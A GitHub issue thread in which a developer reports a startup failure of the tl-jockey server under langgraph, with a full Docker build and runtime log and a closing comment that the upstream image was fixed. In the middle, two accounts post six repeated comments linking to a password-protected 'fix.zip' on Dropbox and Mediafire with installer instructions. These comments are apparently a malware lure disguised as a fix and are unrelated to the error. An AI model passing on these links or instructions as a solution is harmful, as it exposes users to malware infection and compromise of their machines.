### ISSUE TITLE
Error in running jockey server

### ISSUE THREAD

**Issue by seyeong-han** [twelvelabs-io/tl-jockey#67]
I was working on connecting the `jockey server` with the frontend. It worked perfectly yesterday, but today I encountered a new error and can't run the server using `langgraph up`.  
I checked the version of PyPi packages are all the same as yesterday, but I think the only difference was the *langgraph-api docker image*. I could find `langgraph` was using  `docker.io/langchain/langgraph-api:3.11` image, and that image has been newly pushed *5 minutes ago* like the screenshot below. 
I just saw two new updates today for the `langgraph-api:3.11,`, and I suspect they caused new errors.

![image](https://github.com/user-attachments/assets/b6f1a293-c018-41c3-be3c-edd29c9d7b4d)

I couldn't find any issues about this on `langchain-ai/langgraph`, so I created a [new issue](https://github.com/langchain-ai/langgraph/issues/1468).  

Has anybody solved this problem?

The below is the full fail log of `python -m jockey server`.  
```
python -m jockey server
Using langgraph-cli command:
         sudo /home/young/miniconda3/envs/jockey/bin/langgraph up -c /home/young/project/twelvelabs/tl-jockey/langgraph.json -d /home/young/project/twelvelabs/tl-jockey/compose.yaml --recreate --verbose
[sudo] password for young: 
Starting LangGraph API server...
For local dev, requires env var LANGSMITH_API_KEY with access to LangGraph Cloud closed beta.
For production use, requires a license key in env var LANGGRAPH_CLOUD_LICENSE_KEY.
| Pulling...+ docker pull langchain/langgraph-api:3.11
\ Pulling...3.11: Pulling from langchain/langgraph-api
Digest: sha256:f38476de9d38e566a93346da0cc4f7b83329590721d94876ba361b27a1aa23ee
Status: Image is up to date for langchain/langgraph-api:3.11
docker.io/langchain/langgraph-api:3.11

What's Next?
  1. Sign in to your Docker account → docker login
  2. View a summary of image vulnerabilities and recommendations → docker scout quickview langchain/langgraph-api:3.11
| Pulling...Error response from daemon: get langgraph-data: no such volume
+ docker compose --project-directory /home/young/project/twelvelabs/tl-jockey -f /home/young/project/twelvelabs/tl-jockey/compose.yaml -f - up --remove-orphans --force-recreate --renew-anon-volumes --abort-on-container-exit <
volumes:
    langgraph-data:
        driver: local
services:
    langgraph-redis:
        image: redis:6
        healthcheck:
            test: redis-cli ping
            interval: 5s
            timeout: 1s
            retries: 5
    langgraph-postgres:
        image: postgres:16
        ports:
            - "5433:5432"
        environment:
            POSTGRES_DB: postgres
            POSTGRES_USER: postgres
            POSTGRES_PASSWORD: postgres
        volumes:
            - langgraph-data:/var/lib/postgresql/data
        healthcheck:
            test: pg_isready -U postgres
            start_period: 10s
            timeout: 1s
            retries: 5
            interval: 60s
            start_interval: 1s
    langgraph-api:
        ports:
            - "8123:8000"
        depends_on:
            langgraph-redis:
                condition: service_healthy
            langgraph-postgres:
                condition: service_healthy
        environment:
            REDIS_URI: redis://langgraph-redis:6379
            POSTGRES_URI: postgres://postgres:postgres@langgraph-postgres:5432/postgres?sslmode=disable
        healthcheck:
            test: python /api/healthcheck.py
            interval: 60s
            start_interval: 1s
            start_period: 10s
        env_file: .env
        pull_policy: build
        build:
            context: .
            dockerfile_inline: |
                FROM langchain/langgraph-api:3.11
                RUN apt-get update && apt-get install -y wget xz-utils
                RUN wget https://johnvansickle.com/ffmpeg/builds/ffmpeg-git-amd64-static.tar.xz
                RUN wget https://johnvansickle.com/ffmpeg/builds/ffmpeg-git-amd64-static.tar.xz.md5
                RUN md5sum -c ffmpeg-git-amd64-static.tar.xz.md5
                RUN tar xvf ffmpeg-git-amd64-static.tar.xz
                RUN mv ffmpeg-git-*-amd64-static/ffmpeg ffmpeg-git-*-amd64-static/ffprobe /usr/local/bin/
                ADD . /deps/tl-jockey
                RUN PYTHONDONTWRITEBYTECODE=1 pip install --no-cache-dir -c /api/constraints.txt -e /deps/*
                ENV LANGSERVE_GRAPHS='{"jockey": "jockey.app:jockey"}'
                WORKDIR /deps/tl-jockey
        
| Building...#0 building with "default" instance using docker driver

#1 [langgraph-api internal] load build definition from Dockerfile
#1 transferring dockerfile: 672B done
#1 DONE 0.0s

#2 [langgraph-api internal] load metadata for docker.io/langchain/langgraph-api:3.11
#2 DONE 0.0s

#3 [langgraph-api internal] load .dockerignore
#3 transferring context: 2B done
#3 DONE 0.0s

#4 [langgraph-api  1/10] FROM docker.io/langchain/langgraph-api:3.11
#4 DONE 0.0s

#5 [langgraph-api internal] load build context
/ Building...#5 transferring context: 9.95MB 2.7s done
#5 DONE 3.1s

#6 [langgraph-api  2/10] RUN apt-get update && apt-get install -y wget xz-utils
#6 CACHED

#7 [langgraph-api  3/10] RUN wget https://johnvansickle.com/ffmpeg/builds/ffmpeg-git-amd64-static.tar.xz
#7 CACHED

#8 [langgraph-api  4/10] RUN wget https://johnvansickle.com/ffmpeg/builds/ffmpeg-git-amd64-static.tar.xz.md5
#8 CACHED

#9 [langgraph-api  8/10] ADD . /deps/tl-jockey
#9 CACHED

#10 [langgraph-api  5/10] RUN md5sum -c ffmpeg-git-amd64-static.tar.xz.md5
#10 CACHED

#11 [langgraph-api  6/10] RUN tar xvf ffmpeg-git-amd64-static.tar.xz
#11 CACHED

#12 [langgraph-api  9/10] RUN PYTHONDONTWRITEBYTECODE=1 pip install --no-cache-dir -c /api/constraints.txt -e /deps/*
#12 CACHED

#13 [langgraph-api  7/10] RUN mv ffmpeg-git-*-amd64-static/ffmpeg ffmpeg-git-*-amd64-static/ffprobe /usr/local/bin/
#13 CACHED

#14 [langgraph-api 10/10] WORKDIR /deps/tl-jockey
#14 CACHED

#15 [langgraph-api] exporting to image
#15 exporting layers done
#15 writing image sha256:1780e2dfefa0d67824551de6e777f87ba8ecf597af48e25a22938a62c322410b done
#15 naming to docker.io/library/tl-jockey-langgraph-api done
#15 DONE 0.0s
- Building... Network tl-jockey_default  Creating
\ Building... Network tl-jockey_default  Created
 Container tl-jockey-langgraph-postgres-1  Creating
 Container tl-jockey-langgraph-redis-1  Creating
| Building... Container tl-jockey-langgraph-redis-1  Created
/ Building... Container tl-jockey-langgraph-postgres-1  Created
 Container tl-jockey-langgraph-api-1  Creating
 Container tl-jockey-langgraph-api-1  Created
Attaching to langgraph-api-1, langgraph-postgres-1, langgraph-redis-1
| Building...langgraph-redis-1     | 1:C 26 Aug 2024 01:34:29.884 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
langgraph-redis-1     | 1:C 26 Aug 2024 01:34:29.884 # Redis version=6.2.14, bits=64, commit=00000000, modified=0, pid=1, just started
langgraph-redis-1     | 1:C 26 Aug 2024 01:34:29.884 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
langgraph-redis-1     | 1:M 26 Aug 2024 01:34:29.884 * monotonic clock: POSIX clock_gettime
langgraph-redis-1     | 1:M 26 Aug 2024 01:34:29.885 * Running mode=standalone, port=6379.
langgraph-redis-1     | 1:M 26 Aug 2024 01:34:29.885 # Server initialized
langgraph-redis-1     | 1:M 26 Aug 2024 01:34:29.885 # WARNING Memory overcommit must be enabled! Without it, a background save or replication may fail under low memory condition. Being disabled, it can can also cause failures without low memory condition, see https://github.com/jemalloc/jemalloc/issues/1328. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
langgraph-redis-1     | 1:M 26 Aug 2024 01:34:29.885 * Ready to accept connections
langgraph-postgres-1  | 
langgraph-postgres-1  | PostgreSQL Database directory appears to contain a database; Skipping initialization
langgraph-postgres-1  | 
/ Building...langgraph-postgres-1  | 2024-08-26 01:34:29.977 UTC [1] LOG:  starting PostgreSQL 16.4 (Debian 16.4-1.pgdg120+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit
langgraph-postgres-1  | 2024-08-26 01:34:29.978 UTC [1] LOG:  listening on IPv4 address "0.0.0.0", port 5432
langgraph-postgres-1  | 2024-08-26 01:34:29.978 UTC [1] LOG:  listening on IPv6 address "::", port 5432
langgraph-postgres-1  | 2024-08-26 01:34:29.991 UTC [1] LOG:  listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432"
langgraph-postgres-1  | 2024-08-26 01:34:30.009 UTC [29] LOG:  database system was shut down at 2024-08-25 22:40:03 UTC
langgraph-postgres-1  | 2024-08-26 01:34:30.023 UTC [1] LOG:  database system is ready to accept connections
\ Building...langgraph-api-1       | 2024-08-26T01:34:36.616084Z [info     ] Started server process [1]     [uvicorn.error] api_revision=20fd12a api_variant=licensed color_message=Started server process [%d] filename=server.py func_name=_serve lineno=82
langgraph-api-1       | 2024-08-26T01:34:36.616232Z [info     ] Waiting for application startup. [uvicorn.error] api_revision=20fd12a api_variant=licensed filename=on.py func_name=startup lineno=48
langgraph-api-1       | 2024-08-26T01:34:36.616422Z [warning  ] No license key found, running in test mode with LangSmith API key. For production use, set LANGGRAPH_CLOUD_LICENSE_KEY in environment. [langgraph_license.validation] api_revision=20fd12a api_variant=licensed filename=validation.py func_name=get_license_status lineno=80
- Building...langgraph-api-1       | 2024-08-26T01:34:36.916378Z [info     ] HTTP Request: GET https://api.smith.langchain.com/auth?langgraph-api=true "HTTP/1.1 200 OK" [httpx] api_revision=20fd12a api_variant=licensed filename=_client.py func_name=_send_single_request lineno=1773
\ Building...langgraph-api-1       | 2024-08-26T01:34:36.963153Z [error    ] Traceback (most recent call last):
langgraph-api-1       |   File "/usr/local/lib/python3.11/site-packages/starlette/routing.py", line 730, in lifespan
langgraph-api-1       |     async with self.lifespan_context(app) as maybe_state:
langgraph-api-1       |   File "/usr/local/lib/python3.11/contextlib.py", line 210, in __aenter__
langgraph-api-1       |     return await anext(self.gen)
langgraph-api-1       |            ^^^^^^^^^^^^^^^^^^^^^
langgraph-api-1       |   File "/api/langgraph_api/lifespan.py", line 21, in lifespan
langgraph-api-1       |   File "/api/langgraph_api/shared/graph.py", line 147, in collect_graphs_from_env
langgraph-api-1       |   File "/api/langgraph_api/shared/graph.py", line 113, in is_js_spec
langgraph-api-1       |   File "<frozen posixpath>", line 118, in splitext
langgraph-api-1       | TypeError: expected str, bytes or os.PathLike object, not NoneType
langgraph-api-1       |  [uvicorn.error] api_revision=20fd12a api_variant=licensed filename=on.py func_name=send lineno=121
langgraph-api-1       | 2024-08-26T01:34:36.963336Z [error    ] Application startup failed. Exiting. [uvicorn.error] api_revision=20fd12a api_variant=licensed filename=on.py func_name=startup lineno=59
- Building...langgraph-api-1 exited with code 3
Aborting on container exit...
 Container tl-jockey-langgraph-api-1  Stopping
 Container tl-jockey-langgraph-api-1  Stopped
 Container tl-jockey-langgraph-redis-1  Stopping
 Container tl-jockey-langgraph-postgres-1  Stopping
| Building... Container tl-jockey-langgraph-redis-1  Stopped
/ Building... Network tl-jockey_default  Creating
 Network tl-jockey_default  Created
 Container tl-jockey-langgraph-postgres-1  Creating
 Container tl-jockey-langgraph-redis-1  Creating
 Container tl-jockey-langgraph-redis-1  Created
 Container tl-jockey-langgraph-postgres-1  Created
 Container tl-jockey-langgraph-api-1  Creating
 Container tl-jockey-langgraph-api-1  Created
langgraph-postgres-1  | 2024-08-26 01:34:29.977 UTC [1] LOG:  starting PostgreSQL 16.4 (Debian 16.4-1.pgdg120+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit
langgraph-postgres-1  | 2024-08-26 01:34:29.978 UTC [1] LOG:  listening on IPv4 address "0.0.0.0", port 5432
langgraph-postgres-1  | 2024-08-26 01:34:29.978 UTC [1] LOG:  listening on IPv6 address "::", port 5432
langgraph-postgres-1  | 2024-08-26 01:34:29.991 UTC [1] LOG:  listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432"
langgraph-postgres-1  | 2024-08-26 01:34:30.009 UTC [29] LOG:  database system was shut down at 2024-08-25 22:40:03 UTC
langgraph-postgres-1  | 2024-08-26 01:34:30.023 UTC [1] LOG:  database system is ready to accept connections
Aborting on container exit...
 Container tl-jockey-langgraph-api-1  Stopping
 Container tl-jockey-langgraph-api-1  Stopped
 Container tl-jockey-langgraph-redis-1  Stopping
 Container tl-jockey-langgraph-postgres-1  Stopping
 Container tl-jockey-langgraph-redis-1  Stopped
 Container tl-jockey-langgraph-postgres-1  Stopped
 Container tl-jockey-langgraph-postgres-1  Stopped
#0 building with "default" instance using docker driver

#1 [langgraph-api internal] load build definition from Dockerfile
#1 transferring dockerfile: 672B done
#1 DONE 0.0s

#2 [langgraph-api internal] load metadata for docker.io/langchain/langgraph-api:3.11
#2 DONE 0.0s

#3 [langgraph-api internal] load .dockerignore
#3 transferring context: 2B done
#3 DONE 0.0s

#4 [langgraph-api  1/10] FROM docker.io/langchain/langgraph-api:3.11
#4 DONE 0.0s

#5 [langgraph-api internal] load build context
#5 transferring context: 9.95MB 2.7s done
#5 DONE 3.1s

#6 [langgraph-api  2/10] RUN apt-get update && apt-get install -y wget xz-utils
#6 CACHED

#7 [langgraph-api  3/10] RUN wget https://johnvansickle.com/ffmpeg/builds/ffmpeg-git-amd64-static.tar.xz
#7 CACHED

#8 [langgraph-api  4/10] RUN wget https://johnvansickle.com/ffmpeg/builds/ffmpeg-git-amd64-static.tar.xz.md5
#8 CACHED

#9 [langgraph-api  8/10] ADD . /deps/tl-jockey
#9 CACHED

#10 [langgraph-api  5/10] RUN md5sum -c ffmpeg-git-amd64-static.tar.xz.md5
#10 CACHED

#11 [langgraph-api  6/10] RUN tar xvf ffmpeg-git-amd64-static.tar.xz
#11 CACHED

#12 [langgraph-api  9/10] RUN PYTHONDONTWRITEBYTECODE=1 pip install --no-cache-dir -c /api/constraints.txt -e /deps/*
#12 CACHED

#13 [langgraph-api  7/10] RUN mv ffmpeg-git-*-amd64-static/ffmpeg ffmpeg-git-*-amd64-static/ffprobe /usr/local/bin/
#13 CACHED

#14 [langgraph-api 10/10] WORKDIR /deps/tl-jockey
#14 CACHED

#15 [langgraph-api] exporting to image
#15 exporting layers done
#15 writing image sha256:1780e2dfefa0d67824551de6e777f87ba8ecf597af48e25a22938a62c322410b done
#15 naming to docker.io/library/tl-jockey-langgraph-api done
#15 DONE 0.0s
Attaching to langgraph-api-1, langgraph-postgres-1, langgraph-redis-1
langgraph-redis-1     | 1:C 26 Aug 2024 01:34:29.884 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
langgraph-redis-1     | 1:C 26 Aug 2024 01:34:29.884 # Redis version=6.2.14, bits=64, commit=00000000, modified=0, pid=1, just started
langgraph-redis-1     | 1:C 26 Aug 2024 01:34:29.884 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
langgraph-redis-1     | 1:M 26 Aug 2024 01:34:29.884 * monotonic clock: POSIX clock_gettime
langgraph-redis-1     | 1:M 26 Aug 2024 01:34:29.885 * Running mode=standalone, port=6379.
langgraph-redis-1     | 1:M 26 Aug 2024 01:34:29.885 # Server initialized
langgraph-redis-1     | 1:M 26 Aug 2024 01:34:29.885 # WARNING Memory overcommit must be enabled! Without it, a background save or replication may fail under low memory condition. Being disabled, it can can also cause failures without low memory condition, see https://github.com/jemalloc/jemalloc/issues/1328. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
langgraph-redis-1     | 1:M 26 Aug 2024 01:34:29.885 * Ready to accept connections
langgraph-postgres-1  | 
langgraph-postgres-1  | PostgreSQL Database directory appears to contain a database; Skipping initialization
langgraph-postgres-1  | 
langgraph-api-1       | 2024-08-26T01:34:36.616084Z [info     ] Started server process [1]     [uvicorn.error] api_revision=20fd12a api_variant=licensed color_message=Started server process [%d] filename=server.py func_name=_serve lineno=82
langgraph-api-1       | 2024-08-26T01:34:36.616232Z [info     ] Waiting for application startup. [uvicorn.error] api_revision=20fd12a api_variant=licensed filename=on.py func_name=startup lineno=48
langgraph-api-1       | 2024-08-26T01:34:36.616422Z [warning  ] No license key found, running in test mode with LangSmith API key. For production use, set LANGGRAPH_CLOUD_LICENSE_KEY in environment. [langgraph_license.validation] api_revision=20fd12a api_variant=licensed filename=validation.py func_name=get_license_status lineno=80
langgraph-api-1       | 2024-08-26T01:34:36.916378Z [info     ] HTTP Request: GET https://api.smith.langchain.com/auth?langgraph-api=true "HTTP/1.1 200 OK" [httpx] api_revision=20fd12a api_variant=licensed filename=_client.py func_name=_send_single_request lineno=1773
langgraph-api-1       | 2024-08-26T01:34:36.963153Z [error    ] Traceback (most recent call last):
langgraph-api-1       |   File "/usr/local/lib/python3.11/site-packages/starlette/routing.py", line 730, in lifespan
langgraph-api-1       |     async with self.lifespan_context(app) as maybe_state:
langgraph-api-1       |   File "/usr/local/lib/python3.11/contextlib.py", line 210, in __aenter__
langgraph-api-1       |     return await anext(self.gen)
langgraph-api-1       |            ^^^^^^^^^^^^^^^^^^^^^
langgraph-api-1       |   File "/api/langgraph_api/lifespan.py", line 21, in lifespan
langgraph-api-1       |   File "/api/langgraph_api/shared/graph.py", line 147, in collect_graphs_from_env
langgraph-api-1       |   File "/api/langgraph_api/shared/graph.py", line 113, in is_js_spec
langgraph-api-1       |   File "<frozen posixpath>", line 118, in splitext
langgraph-api-1       | TypeError: expected str, bytes or os.PathLike object, not NoneType
langgraph-api-1       |  [uvicorn.error] api_revision=20fd12a api_variant=licensed filename=on.py func_name=send lineno=121
langgraph-api-1       | 2024-08-26T01:34:36.963336Z [error    ] Application startup failed. Exiting. [uvicorn.error] api_revision=20fd12a api_variant=licensed filename=on.py func_name=startup lineno=59
langgraph-api-1 exited with code 3
Command exited with non-zero status 3.
```

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seyeong-han** [comment]
It was `docker.io/langchain/langgraph-api:3.11` docker image problem.
They solved this [issue](https://github.com/langchain-ai/langgraph/issues/1468).
I checked it, and it worked well.
